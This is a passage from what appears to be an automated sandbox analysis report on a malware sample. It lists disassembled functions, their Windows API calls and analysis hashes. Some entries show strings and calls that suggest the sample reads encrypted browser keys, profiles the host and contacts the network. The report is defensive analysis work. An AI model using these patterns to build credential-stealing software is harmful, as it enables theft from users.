                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2311089104-0
                                                                                                                                                                                                                                                  • Opcode ID: b98cbdf50d7e701a5be6d0f0972cbf4a774099c09408808f8050ae90e96a3dbc
                                                                                                                                                                                                                                                  • Instruction ID: 1266aaa71881ae481f911ec71e24bbf914394a3ed24a1c6c96427cdecb61913f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b98cbdf50d7e701a5be6d0f0972cbf4a774099c09408808f8050ae90e96a3dbc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B219CB52007019FC720DF65C845A6AB7F6FFC9310F00892AF996872A0DB74E851CB56
                                                                                                                                                                                                                                                  Function 0040B14B Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                    • Part of subcall function 00414B34: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,0040B194,?,?,?,?,?,?,?), ref: 00414B4F
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,-00000010,00643AC3,?,?,?,?), ref: 0040B2A4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID: $"encrypted_key":"$DPAP$_key.txt
                                                                                                                                                                                                                                                  • API String ID: 82890309-3678897400
                                                                                                                                                                                                                                                  • Opcode ID: 560c7af5f50cd41879125780b016164bba3ba7196f9a72ca2fff042b5dae2ad0
                                                                                                                                                                                                                                                  • Instruction ID: 200056ac7e48790ee9f9f958e2c71caa17006c645cadd2adf35f82bbd2b34129
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 560c7af5f50cd41879125780b016164bba3ba7196f9a72ca2fff042b5dae2ad0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F5127719403599BDB10DFB5DC49AEE77B6FF05308F08016EE890A7291D7389984CBD9
                                                                                                                                                                                                                                                  Function 00406BAE Relevance: 7.6, APIs: 5, Instructions: 68stringnetworkCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1274457161-0
                                                                                                                                                                                                                                                  • Opcode ID: c09bd2fe11c1348f47e017cb7b041520fc743fed67941c6b7e3336a6be8fbed0
                                                                                                                                                                                                                                                  • Instruction ID: 9d1ca6733fe292c31276a17a668bcecf696b10a7d1d66101ed332df4bee839c5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c09bd2fe11c1348f47e017cb7b041520fc743fed67941c6b7e3336a6be8fbed0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D11E1F2A002549FD700EF25AC417993BE5AB95315F19403EF809D7341E779DA428BA6
                                                                                                                                                                                                                                                  Function 00406BE0 Relevance: 7.6, APIs: 5, Instructions: 54stringnetworkCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1274457161-0
                                                                                                                                                                                                                                                  • Opcode ID: 38a59c435b2d45f420b464d8d40ae8dc3af5eaaf409ae4e48b30047349412896
                                                                                                                                                                                                                                                  • Instruction ID: 80d2045ad2f8593c330baddbf277162730afe79b108fe80333406e261d85fc85
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38a59c435b2d45f420b464d8d40ae8dc3af5eaaf409ae4e48b30047349412896
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D01A5F1A002489FD700EF25EC41BAE77E8EB99709F11402EF809D7341D774DA058B66
                                                                                                                                                                                                                                                  Function 0041A90D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041A92E
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00407382: lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 004073FA
                                                                                                                                                                                                                                                    • Part of subcall function 00407382: StrCmpCA.SHLWAPI(?,0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,?,00000000,00000000), ref: 00407449
                                                                                                                                                                                                                                                    • Part of subcall function 00407382: InternetOpenA.WININET ref: 0040747C
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?), ref: 0041A9F9
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen$InternetOpen
                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                  • API String ID: 3860179324-2861137601
                                                                                                                                                                                                                                                  • Opcode ID: 9db7e4bd71a96f2ad96fee4485a029e76f8f81f0a0a3d14fd4dcbb05e52f5b74
                                                                                                                                                                                                                                                  • Instruction ID: 280cb0089ae8515307c330337300684973a3070d8c525834bcac429b90799bd2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9db7e4bd71a96f2ad96fee4485a029e76f8f81f0a0a3d14fd4dcbb05e52f5b74
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 593152B5D012099FCB01EF65C982ADEBBF5BF08314F00451AE815A7291DB34BA95CF95
                                                                                                                                                                                                                                                  Function 0041797D Relevance: 4.6, APIs: 3, Instructions: 112sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateObjectSingleSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 309549813-0
                                                                                                                                                                                                                                                  • Opcode ID: d452bcfcc1377c3e87c60ca12b82fb9f930b46db966c0f9d46f134da2ab8ecc5
                                                                                                                                                                                                                                                  • Instruction ID: ea3f199f5e230162cc47f9fcea8af2023e6e25e0fd3ef7ab80fb325c08834ad3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d452bcfcc1377c3e87c60ca12b82fb9f930b46db966c0f9d46f134da2ab8ecc5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 634150B92143048FC705EF65D8869EE77EABF85345F00882EF855C3291DF389A48CBA5
                                                                                                                                                                                                                                                  Function 004125E0 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00412594,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 004125F8
                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00412594,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 00412614
                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0041261F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ??2@$Concurrency::cancel_current_task
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 286195125-0
                                                                                                                                                                                                                                                  • Opcode ID: c534c63760d1d932dc7fddc2ea44355ac0d26d12e54a6b122f5046b95e2529f8
                                                                                                                                                                                                                                                  • Instruction ID: a4ecb42e4321ae6241b5ae991f2ad0685b404bdca419ecb083382337115b196c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c534c63760d1d932dc7fddc2ea44355ac0d26d12e54a6b122f5046b95e2529f8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE08CF3A0111016CA14A2B0AE4AA4FA0885BB4324B04893BB41AD26E4EA7CD5E0C56E
                                                                                                                                                                                                                                                  Function 00413DBF Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0040128A,?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB), ref: 00413DC2
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,0040128A,?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE), ref: 00413DD1
                                                                                                                                                                                                                                                  • GetComputerNameA.KERNEL32(00000000), ref: 00413DDF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4203777966-0
                                                                                                                                                                                                                                                  • Opcode ID: e87addc3917c1582652ae1521c80a92d529d285b71a0c17ec3e8cc84417c586a
                                                                                                                                                                                                                                                  • Instruction ID: f11edcf30a3937a6bf13aa21ee565a1a4d2718e968f7f5cc493714258eaccb72
